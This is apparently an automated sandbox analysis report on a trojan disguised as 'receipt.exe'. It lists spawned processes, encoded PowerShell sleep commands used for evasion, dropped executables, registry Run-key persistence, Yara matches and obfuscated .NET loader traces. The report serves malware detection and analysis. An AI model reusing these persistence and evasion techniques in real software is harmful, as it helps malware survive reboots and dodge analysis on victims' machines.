            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe"
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe "C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exe"
            Source: C:\Users\user\Desktop\receipt.exeProcess created: C:\Users\user\Desktop\receipt.exe C:\Users\user\Desktop\receipt.exe
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeProcess created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exe
            Source: C:\Users\user\Desktop\receipt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
            Source: C:\Users\user\Desktop\receipt.exeFile created: C:\Users\user\AppData\Roaming\ZyfrlcampJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qssrr0pi.tj1.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@27/22@4/1
            Source: C:\Users\user\Desktop\receipt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: receipt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\receipt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\receipt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\receipt.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3596:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\receipt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: receipt.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: receipt.exeStatic file information: File size 1505280 > 1048576
            Source: receipt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: receipt.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x162800
            Source: receipt.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 14.2.Uewizrlgm.exe.2c6dd3c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.receipt.exe.5630000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.receipt.exe.4133bd0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.receipt.exe.3fb3b90.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.receipt.exe.4206fb0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.receipt.exe.5630000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.5490000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.receipt.exe.3f73b70.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.receipt.exe.4306fd0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.receipt.exe.4133bd0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3074e04.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.receipt.exe.30df6fc.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.3.receipt.exe.3f53b50.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.Uewizrlgm.exe.2acc71c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.3.receipt.exe.4306fd0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000003.354725575.0000000004133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.356142164.0000000005630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.575412932.00000000054AB000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.338895273.00000000041C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.352308180.0000000003E96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 4184, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Uewizrlgm.exe PID: 5880, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Uewizrlgm.exe PID: 5988, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Uewizrlgm.exe PID: 5140, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: Uewizrlgm.exe PID: 1800, type: MEMORYSTR
            Source: receipt.exe, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: Uewizrlgm.exe.0.dr, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.receipt.exe.bf0000.0.unpack, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: Cfrstztdf.exe.12.dr, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 12.0.receipt.exe.400000.0.unpack, u0005.cs.Net Code: \x02 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\receipt.exeCode function: 0_2_01683B33 push esp; retn 0133h
            Source: C:\Users\user\Desktop\receipt.exeCode function: 12_2_014B3B12 push esp; retn 0146h
            Source: initial sampleStatic PE information: section name: .text entropy: 7.95312510004089
            Source: initial sampleStatic PE information: section name: .text entropy: 7.95312510004089
            Source: initial sampleStatic PE information: section name: .text entropy: 7.95312510004089
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
            Source: 26.0.receipt.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
            Source: C:\Users\user\Desktop\receipt.exeFile created: C:\Users\user\AppData\Roaming\Zyfrlcamp\Uewizrlgm.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exeJump to dropped file
            Source: C:\Users\user\Desktop\receipt.exeFile created: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Rzqhcgbd1time.exeFile created: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exeJump to dropped file
            Source: C:\Users\user\Desktop\receipt.exeFile created: C:\Users\user\AppData\Roaming\Qwpuntax\Cfrstztdf.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CfrstztdfJump to behavior
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UewizrlgmJump to behavior
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UewizrlgmJump to behavior
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UewizrlgmJump to behavior
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CfrstztdfJump to behavior
            Source: C:\Users\user\Desktop\receipt.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run CfrstztdfJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (102).png
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\receipt.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
